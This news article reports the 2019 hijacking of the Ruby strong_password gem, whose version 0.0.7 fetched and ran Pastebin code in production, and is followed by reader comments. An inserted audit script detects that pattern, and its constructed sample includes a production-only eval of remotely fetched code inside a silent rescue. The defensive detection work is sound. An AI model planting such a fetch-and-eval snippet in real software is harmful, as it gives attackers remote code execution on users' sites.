An eagle-eyed developer has discovered a backdoor recently sneaked into a library (or ‘gem’) used by Ruby on Rails (RoR) web apps to check password strength.
A close shave, then. While the Ruby scripting language and RoR aren’t as popular as they once were, they’re still embedded in numerous enterprise development environments, an unknown number of which might have used the library, strong_password, in its infected version 0.0.7.
The discovery came about after Epion Health developer Tute Costa noticed something unusual while carefully updating a family of libraries used by his company’s developers to fix bugs and security vulnerabilities.
When he looked at the strong_password gem on RubyGems.org, he couldn’t locate a changelog explaining how it got to the updated version from 0.0.6, an event which happened on 25 June 2019.
The previous GitHub version had been updated in October 2018. Comparing the two versions, he noticed the mystery 0.0.7 version embedded a download link which:
Fetches and runs the code stored in a pastebin.com, only if running in production, with an empty exception handling that ignores any error it may raise.
The backdoor would download code from the Pastebin address on production sites, giving the attackers remote code execution and silently hijacking any website unfortunate enough to have updated to the rogue strong_password gem.
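The three traits Costa describes (code fetched from a remote paste, executed only in production, inside a rescue block that swallows every error) are exactly what a reviewer can look for when a gem update arrives without a changelog. The following Ruby script is an added example, not code from the article, from Tute Costa or from the strong_password project: it scans Ruby source for those indicators and grades each file. The two sample sources, the indicator names, the helper functions and the placeholder pastebin URL are all constructed for the example.

```ruby
# Added example: static audit of Ruby source for the fetch-and-eval backdoor
# shape described in the article. Indicator names and samples are constructed;
# the pastebin URL below is a placeholder, not a real paste.

INDICATORS = {
  # code pulled over HTTP (Net::HTTP, open-uri, or any pastebin.com reference)
  remote_fetch:    /Net::HTTP|open-uri|URI\.open|pastebin\.com|\bopen\s*\(\s*['"]https?:/,
  # a string handed to the interpreter at runtime
  dynamic_eval:    /\b(instance_eval|class_eval|module_eval|eval)\b/,
  # behaviour gated on running in production, so it stays invisible in dev/test
  production_gate: /Rails\.env\.production\?|RAILS_ENV/,
  # a rescue clause with an empty body (optionally naming classes or a variable)
  swallowed_error: /rescue(\s+[\w:]+(,\s*[\w:]+)*)?(\s*=>\s*\w+)?\s*[;\n]\s*(end\b|nil\b)/,
}.freeze

# Returns { indicator => [line numbers] } for every indicator found in src.
def audit_source(src)
  findings = Hash.new { |h, k| h[k] = [] }
  src.each_line.with_index(1) do |line, no|
    INDICATORS.each do |name, re|
      next if name == :swallowed_error # spans lines, handled below
      findings[name] << no if line.match?(re)
    end
  end
  if (idx = src.index(INDICATORS[:swallowed_error]))
    findings[:swallowed_error] << src[0...idx].count("\n") + 1
  end
  findings
end

# :backdoor_pattern when remote code is evaluated AND the author tried to hide
# it (production gate or swallowed errors); :review for any dynamic eval;
# :clean otherwise.
def verdict(findings)
  fetch_and_run = findings.key?(:remote_fetch) && findings.key?(:dynamic_eval)
  hidden = findings.key?(:production_gate) || findings.key?(:swallowed_error)
  if fetch_and_run && hidden
    :backdoor_pattern
  elsif findings.key?(:dynamic_eval)
    :review
  else
    :clean
  end
end

# Walks an unpacked gem directory and reports every non-clean file.
def audit_directory(dir)
  Dir.glob(File.join(dir, '**', '*.rb')).sort.each_with_object({}) do |path, report|
    f = audit_source(File.read(path))
    v = verdict(f)
    report[path] = { verdict: v, findings: f } unless v == :clean
  end
end

# Constructed sample shaped like the behaviour the article describes.
SUSPICIOUS = <<~RUBY
  module StrongPassword
    def self.boot
      return unless Rails.env.production?
      begin
        eval(Net::HTTP.get(URI("https://pastebin.com/raw/PLACEHOLDER")))
      rescue
      end
    end
  end
RUBY

# Constructed sample of ordinary password-strength code.
BENIGN = <<~RUBY
  module StrongPassword
    class StrengthChecker
      def is_strong?(password)
        password.length >= 12 && password.match?(/[^a-z]/)
      end
    end
  end
RUBY

if __FILE__ == $0
  { suspicious: SUSPICIOUS, benign: BENIGN }.each do |label, src|
    f = audit_source(src)
    puts "#{label}: #{verdict(f)} #{f.to_h}"
  end
end
```

Run it as a script to see both samples graded, or call `audit_directory` on the unpacked contents of a `.gem` file (`gem unpack name-0.0.7.gem`) before comparing it against the tagged source in the project’s repository. The regexes are deliberately simple and will miss obfuscated variants, so treat a `:clean` result as “nothing obvious”, not as a verdict that the release is safe.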
Adding to this, the versions had been published by an empty account (probably the victim of a Pastebin account hijacking) under a name different from that of the official maintainer, Brian McManus, who replied to an email from Costa to say:
The gem seems to have been pulled out from under me… When I login to rubygems.org I don’t seem to have ownership now.
The latest issue is identified as CVE-2019-13354. The infected library has now been pulled and replaced with 0.0.8.
Part of a pattern
This wasn’t a speculative attack – somebody thought about what they were doing and set out to insert the backdoor in a way that might not be noticed straight away.
It also fits a troubling pattern of recent targeting of Ruby libraries, including the RCE discovered inside the Bootstrap-Sass Ruby library in April.
That hijacking was noticed even more quickly than strong_password’s, but the sheer number of libraries used by RoR (and by other development frameworks in the firing line) raises the question of how much oversight is appropriate when new versions appear.
Luckily, on this occasion, a developer was paying attention. When it comes to security, sometimes someone noticing that something is awry is all that stands between a large community of developers and disaster.
Laurence Marks
Oh! Now look what you’ve gone and done. You’ve just given operators an excuse to not install new updates until others have had a chance to vet them for a few weeks. So much for quick updates to counter zero-day exploits.
John E Dunn
How so? The moral of this incident surely is the need to look for and study changelogs before applying any update. That’s not the same as saying updates shouldn’t be applied.
Murray
My grandson installed speed dial on my phone so, I don’t have to call the operators
Comment Crew
Note to self: Remember to update change log when slipping malware into a library.
ClothedSecurity
> many of which might have used the default library, strong_password, in its infected version 0.0.7.
This gem is not a default library for Ruby on Rails or Ruby, this can be trivially checked here: https://rubygems.org/gems/strong_password/reverse_dependencies
Please check your facts before writing a blog post and don’t use manipulative wording to misrepresent them. Ironic, when you write a blog post about oversights, that you have a pretty big oversight yourself just to have a bit more of a sensationalist text.
Anna Brading
Thanks for your feedback. We’ve corrected the paragraph.
John E Dunn
The word ‘default’ was an error – we’ve removed that because, as you rightly say, that’s not the case.
However, the broader theme of attackers manipulating libraries is important, even if the number of organisations who downloaded this particular rogue update was small.
njorl
“all that stands between a large community of developers and disaster” – would not that disaster also have affected the end users?